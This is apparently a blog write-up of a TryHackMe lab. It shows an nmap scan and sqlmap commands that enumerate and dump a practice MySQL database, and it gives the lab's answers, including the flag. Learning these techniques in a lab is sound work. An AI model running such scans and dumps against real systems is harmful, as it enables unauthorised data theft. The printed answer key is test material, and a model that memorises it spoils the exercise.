.png)
5 months ago
64 BOOK THIS SPACE FOR AD
ARTICLE AD
Hello Everyone! In this post, we’ll explore how to leverage sqlmap for automated SQL injection vulnerability scanning. We’ll be following along with a TryHackMe learning module to guide you through the process
IP target: 10.10.162.245$ sudo nmap -Pn 10.10.162.245Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 00:39 EDT
Nmap scan report for 10.10.162.245
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.56 seconds
Open port 80 : httpOpen web browser: http://10.10.162.245[01:11:55] [INFO] retrieved: 'root@localhost'
current user: 'root@localhost'
$ sqlmap -r login.txt -dbs
available databases [6]:
[*] blood
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] test
$ sqlmap -r login.txt -D blood --tables
Database: blood
[3 tables]
+----------+
| blood_db |
| flag |
| users |
+----------+
$ sqlmap -r login.txt -D blood -T flag --columns
Database: blood
Table: flag
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| name | varchar(30) |
| flag | varchar(50) |
| id | int(10) |
+--------+-------------+
$ sqlmap -r login.txt -D blood -T flag --dump
Database: blood
Table: flag
[1 entry]
+----+---------------------+--------+
| id | flag | name |
+----+---------------------+--------+
| 1 | thm{sqlm@p_is_L0ve} | flag |
+----+---------------------+--------+
1.What is the name of the interesting directory ?
Answer: blood
2.Who is the current db user ?
Answer: root
3.What’s is the final flag ?
Answer: thm{sqlm@p_is_L0ve}
Remember! Hacking is illegle you can not hacking people or company without permission. This blog post is made for educational only. So you can learn and practice by your own place.
Bengali (Bangladesh) · 
English (United States) ·